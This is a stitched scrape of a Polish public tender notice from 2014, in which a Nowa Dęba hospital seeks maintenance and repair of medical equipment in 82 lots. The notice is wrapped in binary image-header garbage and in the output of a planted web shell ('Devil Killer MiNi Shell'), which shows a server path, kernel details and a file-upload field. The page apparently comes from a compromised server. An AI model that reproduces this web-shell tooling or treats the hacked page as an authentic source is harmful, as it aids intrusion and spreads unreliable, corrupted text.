JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140902/291956-N-2014.html

<p class="kh_header"><b>Nowa Dęba: Świadczenie usługi w zakresie wykonywania pogwarancyjnych okresowych przeglądów technicznych oraz napraw bieżących sprzętu i aparatury medycznej</b><br>
<b>Numer ogłoszenia: 291956 - 2014; data zamieszczenia: 02.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Nowej Dębie , ul. M. C. Skłodowskiej 1a, 39-460 Nowa Dęba, woj. podkarpackie, tel. 15 8462651 w. 120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoznowadeba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi w zakresie wykonywania pogwarancyjnych okresowych przeglądów technicznych oraz napraw bieżących sprzętu i aparatury medycznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Świadczenie usługi w zakresie wykonywania pogwarancyjnych okresowych przeglądów technicznych oraz napraw bieżących sprzętu i  aparatury medycznej dla Szpitala Powiatowego  w Nowej Dębie z podziałem na części  (Pakiety) . 
Rodzaj zamówienia :  Usługa
1. Zakres świadczonych usług obejmować będzie  utrzymanie sprawności techniczno - eksploatacyjnej urządzeń medycznych znajdujących się na wyposażeniu Szpitala Powiatowego w Nowej Dębie, wymienionych w Załączniku nr 1- Wykaz Aparatury i Sprzętu Medycznego - Cennik szczegółowy do SIWZ w zakresie: pogwarancyjnych okresowych przeglądów i konserwacji zgodnie z zaleceniami producenta urządzeń oraz  Ustawą z dnia 20 maja 2010r.o wyrobach medycznych ( Dz.U. nr 107 poz, 679 z późn.zm) jak również  bieżących napraw i prowadzenia  paszportów urządzeń medycznych.
2.Wykonawca oświadcza, że :
- dysponuje określonym przez wytwórcę zapleczem technicznym, częściami zamiennymi, częściami zużywalnymi i materiałami eksploatacyjnymi;
- posiada  odpowiednie instrukcje serwisowe wyrobu oraz odpowiednie procedury i instrukcje wykonywania czynności serwisowych;
- posiada odpowiednie kwalifikacje lub zatrudnia osoby z tymi kwalifikacjami oraz doświadczeniem  zawodowym niezbędnym do wykonania przedmiotu zamówienia.
3.Przedmiot zamówienia obejmuje:
1)utrzymanie sprawności techniczno - eksploatacyjnej urządzeń objętych niniejszym zamówieniem,
2)konserwację i zachowanie gotowości eksploatacyjnej opartej o zalecenia producentów urządzeń,
3)przeprowadzanie okresowych przeglądów i kontroli stanu technicznego sprzętu medycznego,
4)prowadzenie paszportów technicznych sprzętu medycznego,
5)prowadzenie kart naprawy urządzeń,
6)okresowe kontrole sprzętu pomiarowego (kalibracja),
7)wycena aparatury medycznej oraz sporządzanie notatek o stanie urządzeń, w tym nie nadających się do naprawy.
4.SZCZEGÓŁOWE WARUNKI REALIZACJI ZAMÓWIENIA:
- Konserwacji i przeglądom podlegają urządzenia i aparatura medyczna wymieniona w Załączniku nr 1 do SIWZ.
- Okresowe przeglądy techniczne będą wykonywane z częstotliwością określoną w Załączniku nr 1 - Wykaz Aparatury i Sprzętu Medycznego - Cennik szczegółowy do SIWZ i w terminach zgodnie z harmonogramem ustalonym przez Zamawiającego w porozumieniu z Wykonawcą wynikających z właściwości danego sprzętu   aparatury, obowiązującymi instrukcjami, standardami, normą  jak również wynikających z zaleceń producenta i w obecności pracownika Działu Techniczno-Gospodarczego. 
-Konieczność przeprowadzenia napraw lub wymiany części zamiennych na nowe Wykonawca będzie uzgadniał z Działem  Technicznym  Zamawiającego, z podaniem przewidywanych kosztów w formie kalkulacji cenowej  kosztorysu.    
Wykonanie ich nastąpi po akceptacji kalkulacji cenowej  kosztorysu przez Kierownika Zamawiającego.
- Wykonawca będzie realizował przedmiot zamówienia osobami przeszkolonymi, posiadającymi stosowne kwalifikacje lub autoryzacje, zgodnie z wymogami producenta sprzętu medycznego oraz obowiązującymi normami i odnośnymi przepisami z zachowaniem przepisów BHP i P POŻ .
-  Czynności przeglądowo - konserwacyjne sprzętu i aparatury medycznej obejmują w szczególności:
1) sprawdzenie prawidłowości działania
2) wymianę materiałów eksploatacyjnych, m.in. takich jak: filtry wody, filtry powietrza, uszczelki, zawory, zużyte akumulatory - baterie, bezpieczniki, żarówki, promienniki, siłowniki, sprężyny, czujniki, grzałki, elektrody itp. Wynikających z normalnego użytkowania sprzętu; 
3) określenie czy sprzęt może być dopuszczony do użytkowania;   
4) wskazanie zakresu niezbędnych czynności w celu dopuszczenia sprzętu i aparatury medycznej do dalszej eksploatacji;
5)sprawdzenie i ewentualne czyszczenie elementów aparatury i urządzeń (w tym mycie chemiczne wywoływarek RTG)
6) sprawdzenie bezpieczeństwa mechanicznego i elektrycznego;
7) ustawianie (regulacja) wymaganych przez producenta parametrów,
8) ewentualną naprawę zużytych podzespołów lub ich wymianę, po akceptacji Zamawiającego;  
9) w przypadku urządzeń podlegających odbiorowi przez inspektorów UDT: przygotowanie urządzenia do odbioru, wykonanie czynności w związku z zaleceniami inspektorów UDT, uczestnictwo w odbiorach z  udziałem inspektorów UDT.
- Każdą czynność przeglądowo- konserwacyjną oraz sprawdzenie sprzętu pomiarowego musi zostać potwierdzone w  karcie pracy i wpisane przez Wykonawcę do paszportu technicznego urządzenia tj.wprowadzenie każdorazowo wpisu o wykonanych czynnościach, uszkodzeniach oraz o dopuszczeniu lub nie dopuszczeniu sprzętu medycznego do dalszego użytkowania.
- W przypadku wyłączenia urządzenia z użytkowania do Wykonawcy należy obowiązek umieszczenia na niesprawnym  urządzeniu czytelnej informacji: urządzenie niesprawne nie używać lub urządzenie przeznaczone do naprawy - nie  używać.
- Zgłoszenia konieczności przeprowadzenia przeglądu technicznego lub naprawy przekazywane będą w formie telefonicznej lub pisemnie drogą e-mail, przez upoważnionego przedstawiciela Zamawiającego.
- Maksymalny czas reakcji Wykonawcy od momentu zgłoszenia  wynosi 48 godzin (w dni  robocze), lub w pierwszy dzień roboczy po zgłoszeniu w dniu wolnym od pracy.
- Usunięcie usterek zostanie dokonane w przypadku dostępności części zamiennych w terminie 5 dni roboczych od otrzymania przez Wykonawcę akceptacji kosztów naprawy, a w przypadku napraw  bardziej skomplikowanych w terminie 10 dni roboczych od otrzymania akceptacji kosztu naprawy.
- Gwarancja na wymienione części zamienne i materiały nie może być krótsza od gwarancji danej przez ich producenta.
- Zamawiający zastrzega sobie prawo do zmiany ilości urządzeń podlegających konserwacji i przeglądom technicznym, w  ramach przeprowadzonych postępowań kasacyjnych.
5.Zamówienie obejmuje  82 Pakiety  - części (dopuszcza się składanie ofert częściowych na poszczególne Pakiety lub na całość  zamówienia).
Zamawiający dopuszcza składanie ofert częściowych.
Części zamówienia:
PAKIET Nr 1 -  Negatoskopy				           
PAKIET Nr 2 -  Sprzęt endoskopowo - laparoskopowy STORZ					           
PAKIET  Nr 3   -  Ssaki						
PAKIET  Nr 4   -  Lancentron					 
PAKIET Nr  5   -  Pompy Infuzyjne firmy KWAPISZ			
PAKIET  Nr 6   -  Ssaki elektryczne					
PAKIET  Nr 7   -  Koncentratory tlenu					 
PAKIET  Nr 8   -  Aparat do znieczulenia  ogólnego				 
PAKIET  Nr 9   -  Mamograf				             
PAKIET  Nr 10  - Aparat do znieczulenia ogólnego		 
PAKIET  Nr 11  - Mikroskopy					              
PAKIET  Nr 12  - Aparatura endoskopowa firmy PENTAX		 
PAKIET  Nr 13  - Lampy operacyjne i zabiegowe			
PAKIET  Nr 14  - Aparatura laboratoryjna				 
PAKIET  Nr  15 - Aparatura  laboratoryjna				 
PAKIET  Nr 16  - Wirówki laboratoryjne				 
PAKIET  Nr 17  - Mikroskopy laboratoryjne				 
PAKIET  Nr 18  - Cieplarki 	
PAKIET  Nr 19  - Aparatura do zabiegów chirurgicznych		 
PAKIET  Nr  20 - Pompy infuzyjne					 
PAKIET  Nr  21 - Urządzenia do sterylizacji				 
PAKIET  Nr  22 -  Aparaty EKG					 
PAKIET  Nr  23 -  Kardiomonitory					  
PAKIET  Nr  24 -  Pulsoksymetry, kapnografy, kardiotokografy	               
PAKIET  Nr  25 -  Wywoływarka automatyczna                                                            
PAKIET  Nr  26 -  Stół  operacyjny			   
PAKIET  Nr  27 -  Lampy zabiegowe					   
PAKIET  Nr  28 -  Inhalatory                                           		   
PAKIET  Nr  29 -  Stanowisko do pielęgnacji noworodka                         
PAKIET  Nr  30 -  Aparatura do fizykoterapii                                            
PAKIET  Nr  31 -  Aparatura do fizykoterapii                                            
PAKIET  Nr  32 -  Kardiostymulator zewnętrzny                                        
PAKIET  Nr  33 -  Aparatura do fizykoterapii                                             
PAKIET  Nr  34 -  Aparatura do fizykoterapii                                            
PAKIET  Nr  35 -   Pompa infuzyjna strzykawkowa                                  
PAKIET  Nr  36 -   Defibrylatory                                                                
PAKIET  Nr  37 -   Inkubatory                                                                    
PAKIET  Nr  38 -   Detektory tętna                                                             
PAKIET  Nr  39 -   Lampa do terapii noworodków	                             
PAKIET  Nr  40 -   Urządzenie do badań wysiłkowych                              
PAKIET  Nr  41 -   Aparatura do fizykoterapii
PAKIET  Nr  42 -    Promiennik podczerwieni				   
PAKIET  Nr  43 -    Myjnia Hydrim				                
PAKIET  Nr  44 -    Aparat KTG					   
PAKIET  Nr  45 -    Myjnie                                                                          
PAKIET  Nr  46 -    Kolposkop                                                                    
PAKIET  Nr  47 -    Lampa operacyjna					    
PAKIET  Nr  48 -    Pulsoksymetry 					    
PAKIET  Nr  49 -    Aparat USG                                                                   
PAKIET  Nr  50 -    Aparat Rtg zębowy
PAKIET  Nr  51 -    Aparat Rtg	
PAKIET  Nr  52 -    Ultrasonografy	
PAKIET  Nr  53 -    Ultrasonograf					    
PAKIET  Nr  54 -    Pompy infuzyjne					    
PAKIET  Nr  55 -    Aparatura do zabiegów elektrochirurgicznych	    
PAKIET  Nr  56 -    Stół operacyjny					    
PAKIET  Nr  57 -    Urządzenie do badania wydolności płuc		
PAKIET  Nr  58 -    Reduktory tlenowe					    
PAKIET  Nr  59 -    Lampy zabiegowe i inne				    
PAKIET  Nr  60 -    System monitorowania glikemii Guardia		    
PAKIET  Nr  61 -    Respirator						    
PAKIET  Nr  62 -    Defibrylatory					    
PAKIET  Nr  63 -    Aparatura laboratoryjna				    
PAKIET  Nr  64 -    Komora dezynfekcyjna				    
PAKIET  Nr  65 -    Ultrasonograf				                 
PAKIET  Nr  66 -    Aparat do znieczulenia ogólnego					    
PAKIET  Nr  67 -    Respirator		    
PAKIET  Nr  68 -    Spirometr						    
PAKIET  Nr  69 -    Myjki ultradźwiękowe				    
PAKIET  Nr  70 -    Aparatura do zabiegów elektrochirurgicznych	    
PAKIET  Nr  71 -    Holter						    
PAKIET  Nr  72 -    Aparat do urodynamiki				    
PAKIET  Nr  73 -    Spirometr diagnostyczny				    
PAKIET  Nr  74 -    Inkubator otwarty dla noworodków			    
PAKIET  Nr  75 -    Aparat CPAP					    
PAKIET  Nr  76 -    Aparat USG						
PAKIET  Nr  77 -    Aparatura do Hydroterapii	
PAKIET  Nr  78 -    Aparatura do fizykoterapii	
PAKIET  Nr  79 -    Aparatura do fizykoterapii				    
PAKIET  Nr  80 -    Aparat Rtg
PAKIET  Nr  81 -    Automatyczny dwugłowy wstrzykiwacz kontrastu
PAKIET  Nr  82 -    Sprzęt endoskopowy firmy OLYMPUS.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.00.00-5, 50.40.00.00-9, 50.42.12.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 82.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie. Ze względu na charakter przedmiotu zamówienia Zamawiający nie żąda od Wykonawców dodatkowych
dokumentów w celu wykazania, iż spełniają w/w warunek. Za spełnienie powyższego warunku Zamawiający uzna złożenie oświadczenia przedstawionego przez Wykonawcę wraz z ofertą -wg wzoru na Załączniku nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz  wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług,w okresie  ostatnich  trzech lat  przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  wraz z podaniem ich wartości , przedmiotu, dat wykonania i podmiotów, na rzecz których usługi  zostały  wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;
Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże  że, zrealizował min. 2 usługi w zakresie świadczenia  usługi na rzecz jednostek  ochrony zdrowia w tym min. 1 w zakresie lecznictwa stacjonarnego ( szpital)  a jeżeli okres  prowadzenia  działalności  jest  krótszy  - w tym okresie  oraz  załączenie dokumentów potwierdzających, że usługi te zostały  wykonane  należycie  lub są wykonywane należycie, każde zrealizowane w wartości nie mniejszej niż zaoferowana wartość brutto oferty złożonej w niniejszym postępowaniu, biorąc pod uwagę łączną wartość brutto poszczególnych pakietów -  na które złożono ofertę ;
Dokument ten będzie potwierdzeniem, że Wykonawca posiada doświadczenie w zakresie realizacji usług będących przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie. Ze względu na charakter przedmiotu zamówienia Zamawiający nie żąda od Wykonawców dodatkowych
dokumentów w celu wykazania, iż spełniają w/w warunek. Za spełnienie powyższego warunku Zamawiający uzna złożenie oświadczenia przedstawionego przez Wykonawcę wraz z ofertą -wg wzoru na Załączniku nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, załączy do oferty oświadczenie pod rygorem odpowiedzialności, iż dysponuje lub będzie dysponował na czas realizacji zamówienia osobami, które będą wykonywały prace w zakresie oferowanych pakietów posiadają wszelkie kwalifikacje i doświadczenie zawodowe na świadczenie usług serwisowania sprzętu medycznego, a wykaz imienny osób przedłoży przed zawarciem umowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłaconą polisę, a przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, i  zobowiązuje się do utrzymania tego  ubezpieczenia przez  okres trwania umowy wraz z dowodem - potwierdzeniem wpłaty przy sumie gwarancyjnej  nie mniejszej niż 30 000,00 zł .
Wykonawca do oferty załącza oświadczenie, że posiada lub będzie posiadał wskazane ubezpieczenie a polisę przedłoży przed zawarciem umowy.
Dokumenty te będą potwierdzeniem sytuacji ekonomicznej  i finansowej Wykonawcy, zapewniającej realizację usługi  zgodnej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)Postanowienia dotyczące wnoszenia  oferty wspólnej przez dwa lub więcej podmioty gospodarcze ( konsorcja  spółki cywilne) :
1.Wykonawcy mogą  wspólnie ubiegać się o udzielenie zamówienia.
2.Jeżeli oferta wspólna złożona przez dwóch lub więcej wykonawców zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza przed podpisaniem umowy w sprawie zamówienia publicznego, Zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej współpracę tych wykonawców, podpisanej przez wszystkich partnerów , przy czym  termin, na jaki została zawarta, nie może być  krótszy niż termin realizacji zamówienia.
3.Wykonawcy ustanawiają  pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy, a pełnomocnictwo / upoważnienie do pełnienia takiej funkcji 
wystawione zgodnie z wymogami ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli  każdego z wykonawców winno być dołączone do oferty.
4.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia  ponoszą solidarną odpowiedzialność za wykonanie umowy. 
Wykonawca udostępni Zamawiającemu w/w dokumenty na każde żądanie Zamawiającego.
Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez  Zamawiającego  oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w 
wyznaczonym terminie, chyba, że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania; 
Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków SIWZ -  udziału w postępowaniu oraz spełnianie przez oferowane dostawy, wymagań określonych przez Zamawiającego, nie później niż w dniu w którym upłynął termin składania ofert.
Zamawiający może wezwać do złożenia wyjaśnień w wyznaczonym przez siebie terminie, dotyczących oświadczeń lub dokumentów, o których mowa w art. 25 ust.1.
Dokumenty są  składane w  oryginale lub kopii  poświadczonej za zgodność  z  oryginałem  przez  Wykonawcę. 
Wykonawca udostępni Zamawiającemu w/w dokumenty na każde żądanie Zamawiającego.
b) Dokumenty i oświadczenia  wymienione w pkt.VI niniejszej SIWZ.
c) Wypełniony i podpisany Załącznik nr 1 do SIWZ - Wykaz  Sprzętu i Aparatury Medycznej - Cennik szczegółowy ( w zależności  od  wybranego pakietu )
d) Wypełniony i podpisany Załącznik nr 2  do SIWZ - Podstawa wyceny prac  
e) Wypełniony i podpisany Załącznik nr 3  do SIWZ - Oferta Wykonawcy( w zależności  od  wybranego pakietu i dla każdego pakietu oddzielnie)
f) Wypełniony i podpisany Załącznik nr 4 do SIWZ - Oświadczenie o spełnieniu warunków udziału w postępowaniu
g)Wypełniony i podpisany Załącznik nr 5 do SIWZ - Oświadczenie o braku podstaw do wykluczenia
h) Parafowany na każdej stronie Załącznik nr 6 do SIWZ - Wzór umowy  
